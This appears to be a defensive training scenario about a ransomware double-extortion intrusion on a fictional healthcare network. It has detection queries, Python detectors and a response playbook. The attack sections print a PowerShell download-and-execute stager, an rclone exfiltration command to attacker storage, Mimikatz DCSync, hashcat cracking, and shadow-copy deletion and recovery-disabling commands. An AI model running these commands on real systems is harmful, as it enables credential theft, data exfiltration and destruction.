
SC-049: Ransomware Double Extortion

Scenario Overview

The threat actor group "CRIMSON JACKAL" targets a mid-size healthcare organization through a spear-phishing campaign delivering a malicious macro document. After gaining initial access, the attackers deploy Cobalt Strike beacons, enumerate Active Directory, escalate privileges to Domain Admin, and exfiltrate 2TB of patient data to attacker-controlled cloud storage. The final stage deploys ransomware across all domain-joined systems, encrypting critical healthcare databases, imaging systems, and EHR platforms. A ransom note demands $4.2M in cryptocurrency, backed by a threat to publish stolen patient records on the group's leak site.

Environment: MedTech Health Systems corporate network at 10.50.0.0/16; Active Directory domain medtech.example.com
Initial Access: Spear-phishing email with malicious Word document (T1566.001)
Impact: $4.2M ransom demand, 2TB patient data exfiltrated, 14-day operational disruption
Difficulty: Advanced
Sector: Healthcare


Attack Timeline

| Timestamp (UTC) | Phase | Action |
|---|---|---|
| 2026-03-01 09:14:00 | Initial Access | Phishing email delivered to billing department (accounts@medtech.example.com) |
| 2026-03-01 09:22:00 | Execution | User opens macro-enabled document; PowerShell stager executes |
| 2026-03-01 09:24:00 | C2 Establishment | Cobalt Strike HTTPS beacon established to c2.update-service.example.com |
| 2026-03-01 11:00:00 | Discovery | AD enumeration via BloodHound, network scanning with AdFind |
| 2026-03-01 14:30:00 | Credential Access | Kerberoasting against service accounts; offline hash cracking |
| 2026-03-02 02:15:00 | Privilege Escalation | Domain Admin obtained via cracked SVC-SQL account password |
| 2026-03-02 03:00:00 | Lateral Movement | PsExec to domain controllers and file servers |
| 2026-03-02 04:00:00 | Collection | Staging patient data from EHR database and file shares |
| 2026-03-02 04:30:00 | Exfiltration | Data exfiltration to cloud storage via rclone (2TB over 18 hours) |
| 2026-03-03 00:00:00 | Impact — Encryption | Ransomware binary deployed via GPO to all domain-joined systems |
| 2026-03-03 00:15:00 | Impact — Ransom Note | Ransom note dropped on all encrypted systems with leak site URL |
| 2026-03-03 06:00:00 | Detection | SOC alerted by mass file rename activity and backup failures |

Technical Analysis

Phase 1: Initial Access — Spear-Phishing Email

CRIMSON JACKAL sends a targeted phishing email impersonating a healthcare insurance provider with a malicious Word document attachment.

# Phishing email headers (reconstructed from mail gateway logs)
From: claims@healthinsure-partners.example.com
To: accounts@medtech.example.com
Subject: URGENT: Updated Insurance Claim Form Q1-2026
Date: Sat, 01 Mar 2026 09:14:22 +0000
X-Mailer: Microsoft Outlook 16.0
Attachment: Insurance_Claim_Form_Q1_2026.docm (SHA256: a1b2c3d4...REDACTED)

# Mail gateway analysis:
# - SPF: PASS (attacker registered lookalike domain)
# - DKIM: PASS (attacker controls sending domain)
# - DMARC: PASS
# - Attachment: .docm (macro-enabled) — not blocked by policy
# - No sandbox detonation configured for .docm files

Phase 2: Execution — Macro and PowerShell Stager

The malicious macro executes a PowerShell download cradle that retrieves and launches a Cobalt Strike beacon.

# Macro payload (reconstructed — educational only)
# Stage 1: VBA macro executes PowerShell via WMI
# Event source: Microsoft-Windows-Sysmon/Operational

# Process creation (Event ID 1):
# ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
# CommandLine: powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0A...
# User: MEDTECH\jsmith

# Decoded PowerShell (base64):
# $client = New-Object System.Net.WebClient
# $client.Headers.Add("User-Agent","Mozilla/5.0")
# $data = $client.DownloadData("https://cdn-assets.example.com/update.bin")
# $assembly = [System.Reflection.Assembly]::Load($data)
# $assembly.EntryPoint.Invoke($null, @())

# Stage 2: Cobalt Strike beacon loaded reflectively into memory
# No file dropped to disk — fileless execution
# Beacon config (extracted from memory):
#   C2: c2.update-service.example.com:443 (HTTPS)
#   Polling interval: 60 seconds
#   Jitter: 37%
#   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Phase 3: Discovery — Active Directory Enumeration

The attacker uses BloodHound and AdFind to map the AD environment and identify attack paths to Domain Admin.

# AD enumeration commands (from endpoint EDR telemetry)
# Host: 10.50.10.25 (MEDTECH\jsmith workstation)

# SharpHound collection (in-memory execution via Cobalt Strike)
# Sysmon Event ID 1:
# Process: C:\Windows\System32\cmd.exe
# CommandLine: cmd.exe /c "C:\Users\jsmith\AppData\Local\Temp\s.exe -c All --outputdirectory C:\Users\jsmith\AppData\Local\Temp"

# AdFind queries observed:
adfind.exe -f "(objectcategory=computer)" -csv name operatingSystem
adfind.exe -f "(objectcategory=group)" -csv name member
adfind.exe -f "(&(objectCategory=person)(objectClass=user)(adminCount=1))" -csv name
adfind.exe -f "(servicePrincipalName=*)" -csv name servicePrincipalName

# Network scanning (internal):
# Source: 10.50.10.25
# Targets: 10.50.0.0/16
# Ports: 445, 3389, 22, 1433, 3306, 5985
# Tool: Cobalt Strike port scan module

Phase 4: Credential Access — Kerberoasting

The attacker requests service tickets for accounts with SPNs and cracks them offline.

# Kerberoasting (from domain controller security logs)
# Event ID 4769: Kerberos Service Ticket Request
# Multiple TGS requests for service accounts in rapid succession

# Targeted service accounts:
# SVC-SQL       — MSSQLSvc/sqlprod01.medtech.example.com:1433
# SVC-BACKUP    — backupexec/backup01.medtech.example.com
# SVC-EXCHANGE  — exchangeMDB/mail01.medtech.example.com

# Ticket encryption: RC4_HMAC_MD5 (0x17) — weak, crackable
# All requests from single source: 10.50.10.25
# Time window: 14:30:05 to 14:30:08 (3 seconds — automated tool)

# Offline cracking (attacker-side, reconstructed):
# hashcat -m 13100 -a 0 kerberoast_hashes.txt wordlist.txt -r rules.rule
# SVC-SQL hash cracked in 4 hours: Summer2025! (complexity met but dictionary-based)

Phase 5: Lateral Movement and Privilege Escalation

With the cracked SVC-SQL password, the attacker escalates to Domain Admin through a misconfigured group membership.

# SVC-SQL was member of "Database Admins" group
# "Database Admins" group was nested inside "Domain Admins" — misconfiguration
# This granted the attacker Domain Admin privileges
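The nesting described above is easy to miss when you only look at direct members of Domain Admins. The following is an added example (not part of the original scenario write-up) of the audit a defender would run: it expands nested group membership recursively, records the inheritance path for each effective member, and flags any SPN-bearing service account that ends up with Tier-0 rights. The group snapshot and the SPN table are constructed sample data; the group names mirror the scenario, and the mutual Helpdesk/Tier1 nesting is there to show that cyclic nesting terminates.

```python
from typing import Dict, List

# Constructed group-membership snapshot (not the page's AD data). Keys are groups,
# values are direct members; a member that is itself a key is a nested group.
GROUP_MEMBERS: Dict[str, List[str]] = {
    "Domain Admins": ["Administrator", "Database Admins"],
    "Database Admins": ["SVC-SQL", "dba.alice"],
    "Backup Operators": ["SVC-BACKUP"],
    "Helpdesk": ["Tier1 Support", "h.bob"],
    "Tier1 Support": ["Helpdesk", "t.carol"],  # mutual nesting: must not loop forever
}

# Accounts that carry an SPN and are therefore Kerberoastable (constructed sample).
SPN_ACCOUNTS: Dict[str, str] = {
    "SVC-SQL": "MSSQLSvc/sqlprod01.medtech.example.com:1433",
    "SVC-BACKUP": "backupexec/backup01.medtech.example.com",
    "SVC-EXCHANGE": "exchangeMDB/mail01.medtech.example.com",
}


def effective_members(group: str, groups: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Expand nested groups and return {principal: [group, nested group, ...]}.

    The path records how the principal inherits the membership, which is what an
    auditor needs in order to undo the nesting. Groups already visited are skipped,
    so cyclic nesting terminates.
    """
    found: Dict[str, List[str]] = {}
    seen = {group}
    stack = [(group, [group])]
    while stack:
        current, path = stack.pop()
        for member in groups.get(current, []):
            if member in groups:            # nested group: descend once
                if member not in seen:
                    seen.add(member)
                    stack.append((member, path + [member]))
            elif member not in found:       # leaf principal: keep the first path found
                found[member] = path
    return found


def audit_privileged_spn_accounts(groups: Dict[str, List[str]],
                                  spn_accounts: Dict[str, str],
                                  privileged_groups=("Domain Admins",)) -> List[dict]:
    """Flag SPN-bearing accounts that hold privileged rights through any nesting path."""
    findings = []
    for priv in privileged_groups:
        for principal, path in effective_members(priv, groups).items():
            if principal in spn_accounts:
                findings.append({
                    "account": principal,
                    "spn": spn_accounts[principal],
                    "privileged_group": priv,
                    "path": " -> ".join(path),
                    "direct": len(path) == 1,
                })
    return findings


if __name__ == "__main__":
    for f in audit_privileged_spn_accounts(GROUP_MEMBERS, SPN_ACCOUNTS):
        print(f"{f['account']:12} {f['privileged_group']} via {f['path']}  (SPN {f['spn']})")
```

Run against a real domain, the membership map would be filled from an LDAP export; the logic stays the same. A finding whose `direct` flag is false is exactly the hidden path this scenario turned on.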

# Lateral movement via PsExec (Sysmon Event ID 1):
# Source: 10.50.10.25
# Targets: 10.50.1.10 (DC01), 10.50.1.11 (DC02), 10.50.5.20 (FILE01)
#
# psexec.exe \\10.50.1.10 -u MEDTECH\SVC-SQL -p REDACTED cmd.exe
# psexec.exe \\10.50.5.20 -u MEDTECH\SVC-SQL -p REDACTED cmd.exe

# On domain controller (10.50.1.10):
# DCSync attack to dump all domain password hashes
# Mimikatz: lsadump::dcsync /domain:medtech.example.com /all
# Event ID 4662: Directory Service Access (DCSync indicator)
# Properties: {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} — DS-Replication-Get-Changes-All
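Event ID 4662 with the replication control-access rights is the standard DCSync indicator, but the raw filter is noisy: domain controllers replicate with each other all day, and directory-sync accounts such as Azure AD Connect legitimately hold the same rights. The function below is an added example (not from the original write-up) that parses the GUIDs out of the Properties field, excludes machine accounts and an explicit allowlist, and reports the remaining subjects. The sample events are constructed; the DS-Replication-Get-Changes GUID (1131f6aa-...) is added alongside the Get-Changes-All GUID the page cites, and the MSOL_ account name is a placeholder for a sync account.

```python
import re
from typing import Dict, FrozenSet, List

# Control-access-right GUIDs used by directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class

# Constructed Event ID 4662 samples (not the incident's real DC log). 4662 carries no
# source IP; correlate the subject with its 4624 logon to find the originating host.
SAMPLE_4662: List[Dict[str, str]] = [
    {"SubjectUserName": "DC02$", "SubjectDomainName": "MEDTECH",            # peer DC replicating
     "Properties": f"Control Access\n\t{{{DS_REPLICATION_GET_CHANGES_ALL}}}\n\t{{{DOMAIN_DNS_CLASS}}}"},
    {"SubjectUserName": "SVC-SQL", "SubjectDomainName": "MEDTECH",          # user account replicating
     "Properties": f"Control Access\n\t{{{DS_REPLICATION_GET_CHANGES}}}\n\t"
                   f"{{{DS_REPLICATION_GET_CHANGES_ALL}}}\n\t{{{DOMAIN_DNS_CLASS}}}"},
    {"SubjectUserName": "jsmith", "SubjectDomainName": "MEDTECH",           # unrelated object access
     "Properties": f"Read Property\n\t{{{DOMAIN_DNS_CLASS}}}"},
    {"SubjectUserName": "MSOL_PLACEHOLDER", "SubjectDomainName": "MEDTECH",  # approved sync account
     "Properties": f"Control Access\n\t{{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
]


def detect_dcsync(events: List[Dict[str, str]],
                  allowlist: FrozenSet[str] = frozenset()) -> List[dict]:
    """Return 4662 events where a non-machine, non-allowlisted subject used replication rights."""
    findings = []
    for ev in events:
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(guids & REPLICATION_GUIDS)
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.endswith("$") or subject in allowlist:
            continue  # DCs and approved directory-sync accounts replicate legitimately
        findings.append({"subject": subject, "domain": ev.get("SubjectDomainName", ""),
                         "rights": rights})
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_4662, frozenset({"MSOL_PLACEHOLDER"})):
        print(f"DCSync indicator: {f['domain']}\\{f['subject']} used {f['rights']}")
```

The allowlist should be short and reviewed: every entry on it is an account whose compromise gives the attacker the same result as this scenario's DCSync.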

Phase 6: Collection and Exfiltration

The attacker stages and exfiltrates 2TB of patient records and financial data using rclone to attacker-controlled cloud storage.

# Data staging (from file server 10.50.5.20):
# Targeted directories:
#   \\FILE01\PatientRecords\      — 890 GB (PHI, medical images)
#   \\FILE01\Finance\             — 340 GB (billing, insurance claims)
#   \\FILE01\HR\                  — 180 GB (employee PII)
#   \\SQLPROD01\EHR_Backup\       — 620 GB (EHR database exports)

# Exfiltration via rclone (from EDR process telemetry):
# Process: C:\Users\Public\rclone.exe
# CommandLine: rclone.exe copy "\\FILE01\PatientRecords" remote:exfil-bucket --transfers 8 --bwlimit 50M
# Destination: storage.cloud-backup.example.com (attacker-controlled)
# Duration: ~18 hours at throttled bandwidth
# Total exfiltrated: 2.03 TB

# Network indicators:
# Sustained outbound HTTPS traffic from 10.50.5.20
# Destination: 203.0.113.45:443 (cloud storage endpoint)
# Average throughput: 50 Mbps (intentionally throttled to avoid detection)

Phase 7: Ransomware Deployment

CRIMSON JACKAL deploys the ransomware across all domain-joined systems through a newly created Group Policy Object.

# Ransomware deployment via GPO (from domain controller logs)
# Attacker creates new GPO: "System Security Update — March 2026"
# Links GPO to root domain OU (affects all domain-joined systems)

# GPO configuration:
# Computer Configuration > Policies > Windows Settings > Scripts > Startup
# Script: \\medtech.example.com\SYSVOL\medtech.example.com\scripts\sysupdate.exe
# SHA256: e5f6g7h8...REDACTED (CRIMSONLOCK ransomware variant)

# Ransomware behavior:
# 1. Terminates security software processes (Defender, EDR agents)
# 2. Deletes Volume Shadow Copies: vssadmin delete shadows /all /quiet
# 3. Disables Windows Recovery: bcdedit /set {default} recoveryenabled No
# 4. Encrypts files with AES-256 + RSA-4096 hybrid encryption
# 5. Appends .crimson extension to encrypted files
# 6. Drops ransom note: CRIMSON_RECOVERY.txt in every directory

# Targeted file extensions:
# .mdb .accdb .sql .bak .docx .xlsx .pdf .pst .dicom .hl7 .jpg .png

# Exclusions (to keep system bootable):
# C:\Windows\*, *.exe, *.dll, *.sys

# Ransom note content:
# "Your network has been compromised by CRIMSON JACKAL.
#  All files are encrypted with military-grade encryption.
#  We have also downloaded 2TB of your data including patient records.
#  Payment: 65 BTC ($4,200,000) to wallet: [REDACTED]
#  Leak site: http://crimsonjkl[REDACTED].onion
#  Deadline: 7 days or data will be published."

Detection Opportunities

KQL — Suspicious PowerShell Download Cradle

// Detect PowerShell download cradles commonly used by initial access tools
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName == "powershell.exe" or FileName == "pwsh.exe"
| where ProcessCommandLine has_any (
    "DownloadString", "DownloadData", "DownloadFile",
    "Net.WebClient", "Invoke-WebRequest", "iwr",
    "Start-BitsTransfer", "Invoke-RestMethod"
  )
| where InitiatingProcessFileName in ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")
| project TimeGenerated, DeviceName, AccountName,
    InitiatingProcessFileName, ProcessCommandLine
| sort by TimeGenerated desc
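A caveat on the query above, and on the Phase 2 telemetry it targets: the stager in this scenario ran as `powershell.exe -nop -w hidden -enc ...`, so the strings `DownloadData` and `Net.WebClient` never appear in the raw command line; they only exist inside the base64 (UTF-16LE) payload, which `has_any` does not see. The following is an added example, not code from the original write-up, of the decode-then-match logic a detection pipeline needs: it recognizes any prefix of `-EncodedCommand`, decodes the payload, and scores the event on the Office parent, download-cradle keywords and reflective-load indicators. The Sysmon records are constructed; the encoded script is a reconstruction of the one shown in Phase 2, and the score weights and HIGH/MEDIUM/LOW thresholds are the example's own choices.

```python
import base64
import re
from typing import Optional

CRADLE_INDICATORS = (
    "DownloadString", "DownloadData", "DownloadFile", "Net.WebClient",
    "Invoke-WebRequest", "iwr", "Start-BitsTransfer", "Invoke-RestMethod",
)
REFLECTIVE_INDICATORS = ("Reflection.Assembly", "::Load(", "EntryPoint.Invoke")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")


def _encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 records; not the incident's real telemetry.
SAMPLE_EVENTS = [
    {   # Word spawning an encoded download cradle (the Phase 2 pattern)
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode_ps(
            '$c = New-Object System.Net.WebClient; '
            '$d = $c.DownloadData("https://cdn-assets.example.com/update.bin"); '
            '[System.Reflection.Assembly]::Load($d).EntryPoint.Invoke($null, @())'
        ),
        "User": r"MEDTECH\jsmith",
    },
    {   # an admin script launched from Explorer: nothing to flag
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
        "User": r"MEDTECH\helpdesk",
    },
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        flag = tok[1:].lower()
        # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed payload: nothing to decode
    return None


def analyze_process_event(event: dict) -> dict:
    """Score one process-creation record for an Office-spawned download cradle."""
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Match against the decoded script when there is one; the raw line is then just base64.
    haystack = decoded if decoded is not None else cmdline
    cradle = [k for k in CRADLE_INDICATORS
              if re.search(r"\b" + re.escape(k) + r"\b", haystack, re.IGNORECASE)]
    reflective = [k for k in REFLECTIVE_INDICATORS if k in haystack]
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    office_parent = parent in OFFICE_PARENTS
    # Weights are this example's choice: Office parent is the strongest single signal.
    score = 3 * office_parent + 2 * bool(cradle) + 2 * bool(reflective) + (decoded is not None)
    verdict = "HIGH" if score >= 5 else "MEDIUM" if score >= 3 else "LOW"
    return {"user": event["User"], "parent": parent, "office_parent": office_parent,
            "decoded_command": decoded, "cradle_indicators": cradle,
            "reflective_indicators": reflective, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze_process_event(ev)
        print(f"{r['verdict']:6} score={r['score']} parent={r['parent']} cradle={r['cradle_indicators']}")
```

In Sentinel the same effect is obtained by decoding the `-enc` argument in KQL (`base64_decode_tostring` after extracting the token) before the `has_any` check, or by relying on Script Block Logging (Event ID 4104), which records the script after decoding.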

KQL — Kerberoasting Detection

// Detect Kerberoasting via multiple TGS requests with RC4 encryption
SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"  // RC4_HMAC_MD5
| where ServiceName !endswith "$"  // Exclude machine accounts
| summarize
    TicketCount = count(),
    UniqueServices = dcount(ServiceName),
    Services = make_set(ServiceName),
    SourceIPs = make_set(IpAddress)
    by AccountName = TargetUserName, bin(TimeGenerated, 5m)
| where TicketCount > 3
| where UniqueServices > 2
| sort by TicketCount desc
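To make the thresholds in the query above concrete, here is the same aggregation written out in Python as an added example (not part of the original write-up) and run over a constructed set of Event ID 4769 records modelled on Phase 4: four RC4 service-ticket requests from one workstation inside three seconds, one RC4 request for a machine account, and ordinary AES requests from a second user. The function bins by 5-minute window like the KQL `bin()`, drops machine accounts, and additionally drops failed requests (`Status != 0x0`), a check the KQL does not include. Account names, hosts and timestamps are sample values.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC_MD5 = "0x17"   # etype 23; AES tickets show as 0x11 / 0x12


def _ev(ts: str, user: str, service: str, etype: str, ip: str) -> Dict[str, object]:
    return {"TimeGenerated": datetime.fromisoformat(ts), "EventID": 4769,
            "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": "0x0"}


# Constructed Event ID 4769 sample, not the incident's real DC log.
JSMITH = "jsmith@MEDTECH.EXAMPLE.COM"
SAMPLE_4769 = [
    # four RC4 service tickets for distinct SPN accounts in three seconds: tool-driven
    _ev("2026-03-01T14:30:05", JSMITH, "SVC-SQL", RC4_HMAC_MD5, "10.50.10.25"),
    _ev("2026-03-01T14:30:06", JSMITH, "SVC-BACKUP", RC4_HMAC_MD5, "10.50.10.25"),
    _ev("2026-03-01T14:30:07", JSMITH, "SVC-EXCHANGE", RC4_HMAC_MD5, "10.50.10.25"),
    _ev("2026-03-01T14:30:08", JSMITH, "SVC-REPORTS", RC4_HMAC_MD5, "10.50.10.25"),
    # RC4 ticket for a machine account: excluded, its random 120-char password is not crackable in practice
    _ev("2026-03-01T14:31:00", JSMITH, "FILE01$", RC4_HMAC_MD5, "10.50.10.25"),
    # ordinary AES tickets from another user spread over ten minutes
    _ev("2026-03-01T14:32:10", "h.bob@MEDTECH.EXAMPLE.COM", "SVC-SQL", "0x12", "10.50.10.40"),
    _ev("2026-03-01T14:41:30", "h.bob@MEDTECH.EXAMPLE.COM", "SVC-BACKUP", "0x12", "10.50.10.40"),
]


def _window_start(ts: datetime, minutes: int) -> datetime:
    """Floor a timestamp to the start of its N-minute bin (the KQL bin())."""
    floored = ts.replace(second=0, microsecond=0)
    return floored - timedelta(minutes=floored.minute % minutes)


def detect_kerberoasting(events: List[Dict[str, object]], window_minutes: int = 5,
                         min_tickets: int = 4, min_services: int = 3) -> List[dict]:
    """Per (account, window): count RC4 TGS requests for non-machine SPNs.

    Defaults express the KQL thresholds TicketCount > 3 and UniqueServices > 2.
    """
    agg = defaultdict(lambda: {"ticket_count": 0, "services": set(), "source_ips": set()})
    for ev in events:
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"] != RC4_HMAC_MD5:
            continue
        if str(ev["ServiceName"]).endswith("$") or ev.get("Status") != "0x0":
            continue
        key = (ev["TargetUserName"], _window_start(ev["TimeGenerated"], window_minutes))
        agg[key]["ticket_count"] += 1
        agg[key]["services"].add(ev["ServiceName"])
        agg[key]["source_ips"].add(ev["IpAddress"])
    hits = []
    for (account, start), a in agg.items():
        if a["ticket_count"] >= min_tickets and len(a["services"]) >= min_services:
            hits.append({"account": account, "window_start": start,
                         "ticket_count": a["ticket_count"],
                         "services": sorted(a["services"]),
                         "source_ips": sorted(a["source_ips"])})
    return sorted(hits, key=lambda h: h["ticket_count"], reverse=True)


if __name__ == "__main__":
    for h in detect_kerberoasting(SAMPLE_4769):
        print(f"{h['account']} requested {h['ticket_count']} RC4 tickets for {h['services']} "
              f"from {h['source_ips']} starting {h['window_start']:%H:%M}")
```

Legacy applications that still negotiate RC4 will generate the same pattern for the same service over and over; the distinct-service count is what separates them from an enumeration of every SPN in the domain.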

KQL — Ransomware File Encryption Activity

// Detect mass file rename operations indicative of ransomware
DeviceFileEvents
| where TimeGenerated > ago(1h)
| where ActionType == "FileRenamed"
| where FileName endswith ".crimson" or FileName endswith ".locked"
    or FileName endswith ".encrypted"
| summarize
    RenameCount = count(),
    UniqueDirectories = dcount(FolderPath),
    FirstSeen = min(TimeGenerated),
    LastSeen = max(TimeGenerated)
    by DeviceName
| where RenameCount > 100
| where UniqueDirectories > 5
| extend DurationMinutes = datetime_diff('minute', LastSeen, FirstSeen)
| sort by RenameCount desc

KQL — Rclone Exfiltration Detection

// Detect rclone or similar cloud sync tools used for data exfiltration
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where FileName in ("rclone.exe", "rclone", "megacmd.exe", "megasync.exe")
    or ProcessCommandLine has_any ("rclone", "copy remote:", "sync remote:")
| project TimeGenerated, DeviceName, AccountName,
    FileName, ProcessCommandLine, InitiatingProcessFileName
| sort by TimeGenerated desc

SPL — Cobalt Strike Beacon Detection via Network

index=proxy sourcetype="squid" OR sourcetype="bluecoat"
  cs_method=GET
| eval uri_len=len(cs_uri_path)
| stats count as requests
        avg(bytes_out) as avg_bytes
        stdev(bytes_out) as stdev_bytes
        values(cs_uri_path) as paths
        by src_ip dest_host
| where requests > 50
| where stdev_bytes < 100
| where avg_bytes < 1000
| eval beacon_score = if(stdev_bytes < 50 AND requests > 100, "HIGH",
    if(stdev_bytes < 100 AND requests > 50, "MEDIUM", "LOW"))
| where beacon_score IN ("HIGH", "MEDIUM")
| sort -requests
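The SPL above keys on response-size regularity. The beacon configuration recovered in Phase 2 (60-second polling, 37% jitter) suggests a second, independent signal: request timing. Cobalt Strike's jitter shortens each sleep by a random fraction of the configured value, so inter-request intervals for a beacon fall in a narrow band, while a person browsing produces bursty, long-tailed gaps. The following is an added example, not from the original write-up, that computes both the byte-size spread and the coefficient of variation of the inter-arrival times per source/destination pair over a constructed proxy log with one beaconing pair and one browsing pair. Host names, the `/api/v1/status` path, the 50-request floor and the 0.3 CV cutoff are the example's own assumptions.

```python
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

BEACON_HOST = "c2.update-service.example.com"
BROWSE_HOST = "www.example.com"


def make_sample_proxy_log(seed: int = 7) -> List[dict]:
    """Constructed proxy records: one beaconing pair and one ordinary browsing pair."""
    rng = random.Random(seed)
    t0 = datetime(2026, 3, 1, 9, 24, 0)
    records = []
    t = t0
    for _ in range(120):   # 60 s sleep shortened by up to 37 % jitter; small, near-constant replies
        records.append({"time": t, "src_ip": "10.50.10.25", "dest_host": BEACON_HOST,
                        "cs_uri_path": "/api/v1/status", "bytes_out": rng.randint(180, 240)})
        t += timedelta(seconds=60 * (1 - 0.37 * rng.random()))
    t = t0
    for _ in range(120):   # human browsing: bursty timing, widely varying sizes
        records.append({"time": t, "src_ip": "10.50.10.25", "dest_host": BROWSE_HOST,
                        "cs_uri_path": rng.choice(["/", "/news", "/img/logo.png"]),
                        "bytes_out": rng.randint(300, 60000)})
        t += timedelta(seconds=rng.expovariate(1 / 90))
    return sorted(records, key=lambda r: r["time"])


def analyze_beacons(records: List[dict], min_requests: int = 50,
                    max_interval_cv: float = 0.3,
                    max_bytes_stdev: float = 100.0) -> Dict[Tuple[str, str], dict]:
    """Score each (src_ip, dest_host) pair on timing regularity and reply-size regularity."""
    by_pair: Dict[Tuple[str, str], List[dict]] = defaultdict(list)
    for r in records:
        by_pair[(r["src_ip"], r["dest_host"])].append(r)
    out = {}
    for pair, recs in by_pair.items():
        recs.sort(key=lambda r: r["time"])
        if len(recs) < 2:
            continue  # no interval to measure
        intervals = [(b["time"] - a["time"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean_iv = statistics.mean(intervals)
        # coefficient of variation: jittered beacons stay low, human traffic is near or above 1
        cv = statistics.pstdev(intervals) / mean_iv if mean_iv > 0 else float("inf")
        bytes_sd = statistics.pstdev([r["bytes_out"] for r in recs])
        regular = len(recs) >= min_requests and cv <= max_interval_cv
        if regular and bytes_sd <= max_bytes_stdev:
            verdict = "HIGH"       # both timing and size look machine-generated
        elif regular:
            verdict = "MEDIUM"     # regular timing only (e.g. tasking inflates replies)
        else:
            verdict = "LOW"
        out[pair] = {"requests": len(recs), "mean_interval_s": round(mean_iv, 1),
                     "interval_cv": round(cv, 3), "bytes_stdev": round(bytes_sd, 1),
                     "verdict": verdict}
    return out


if __name__ == "__main__":
    for pair, s in analyze_beacons(make_sample_proxy_log()).items():
        print(f"{s['verdict']:6} {pair[0]} -> {pair[1]}: n={s['requests']} "
              f"mean={s['mean_interval_s']}s cv={s['interval_cv']} bytes_sd={s['bytes_stdev']}")
```

Timing analysis is most useful in the quiet hours between taskings: once the operator is active, reply sizes grow and the size test alone goes quiet, while the sleep cadence persists.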

SPL — Mass File Encryption Detection

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=11 OR EventCode=2
| rex field=TargetFilename "\.(?<extension>[^.]+)$"
| where extension IN ("crimson", "locked", "encrypted", "crypt")
| stats count as encrypted_files
        dc(TargetFilename) as unique_files
        dc(Image) as encrypting_processes
        values(Image) as process_list
        by Computer
| where encrypted_files > 50
| sort -encrypted_files

SPL — Volume Shadow Copy Deletion

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (CommandLine="*vssadmin*delete*shadows*" OR
   CommandLine="*wmic*shadowcopy*delete*" OR
   CommandLine="*bcdedit*/set*recoveryenabled*No*")
| stats count by Computer User CommandLine ParentImage _time
| sort _time

SPL — Rclone Data Exfiltration

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (Image="*rclone*" OR CommandLine="*rclone*" OR CommandLine="*copy*remote:*")
| stats count as executions
        values(CommandLine) as commands
        values(User) as users
        by Computer
| sort -executions

Response Playbook

Immediate Containment (0-30 minutes)

  1. Isolate infected systems from the network immediately — disable switch ports or quarantine via EDR
  2. Disable compromised accounts: SVC-SQL, Domain Admin accounts, jsmith account
  3. Block C2 domains and IPs: c2.update-service.example.com, cdn-assets.example.com, 203.0.113.45
  4. Remove malicious GPO: Delete "System Security Update — March 2026" from AD
  5. Preserve forensic evidence: Memory dumps of infected systems before reimaging
  6. Activate incident response retainer and notify legal counsel

Eradication (30 minutes - 48 hours)

  1. Reset all Domain Admin and service account passwords — assume all credentials compromised
  2. Reset KRBTGT account password twice (with 12-hour interval) to invalidate Golden Tickets
  3. Audit AD group memberships: Remove nested group misconfigurations (Database Admins in Domain Admins)
  4. Scan all endpoints for Cobalt Strike beacons and ransomware artifacts
  5. Revoke all active Kerberos tickets across the domain
  6. Block rclone and similar tools via application control policy
  7. Engage threat intelligence to monitor leak site for data publication

Recovery (48 hours - 14 days)

  1. Restore from offline backups — verify backup integrity before restoration
  2. Rebuild domain controllers from known-good media if DCSync was confirmed
